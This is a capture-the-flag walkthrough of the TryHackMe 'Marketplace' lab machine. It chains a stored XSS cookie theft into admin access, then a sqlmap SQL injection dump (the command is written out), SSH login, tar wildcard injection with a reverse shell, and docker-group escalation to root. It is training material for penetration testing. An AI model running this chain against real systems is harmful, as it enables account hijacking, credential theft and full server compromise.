THM Marketplace
Last updated
Last updated
The sysadmin of The Marketplace, Michael, has given you access to an internal server of his, so you can pentest the marketplace platform he and his team has been working on. He said it still has a few bugs he and his team need to iron out.
Got 3 open port and 2 of them are web http. Looking towards both web port has same display. Let focus on port 80.
Direct access to admin but we donβt have permission. More digging on directory.
From here, I notice some familiar vulnerable from past exercise. The things is admin, message and reports. Let move forward to register.
From here, just put anythings.
We got some form to submit title and description for new item. Then this item will be listing on home page. Other that, we have options to report and contact. Hint here. Report and message. Let proof the concept of XSS.
The payload xss are the basic one. Let check.
Proof that this /new are venerable to xss. We can gain admin cookies without have the credentials. The method is, we gonna upload our xss script. Then report to admin. Once admin read the message, we will grab the token/cookies of that admin.
For this, Iβm not familiar with the xss payload. Using favourite github page to find out the suitable payload for grab cookies.
Change payload to image since it crashes when using xss grabber.php.
After a while, we manage to get admin cookies. Let put into cookies and access to admin page.
Moving forward, we noticed that these pages have all user and type of admin. We known 2 admin which Michael and Jake.
When click on any user, it appears to have ?users=[id] which this vulnerable to SQL injection. At first going to do manually, but Iβm to lazy. Soorrryy.
Open to sqlmap and dump everything.
sqlmap http://targetmachine/admin?user=1 --cookie=[cookies]' --technique=U --delay=2 -dump
From here we got tone of valuable information and ofc some juicy information.
Using the credentials, let login in ssh.
Since we have the password, let check user permission. We notice jack can be micheal without password using backup.sh
What is backup.sh??
Notice * which mean wildcard injection. Let check gtfobin and pass exercise.
Create payload or just edit past payload.
Run as Michael.
Donβt forget to open listener with stated port.
Checking into id, Michael have docker access.
And this docker are vulnerable which been reported. Synack.
Using gtfobin and establish root shell.
Finally, manage to get root in this machine.
Study
XSS in listing form led to Admin access.
SQL injection in user.
Not patching docker lead to root privilege.
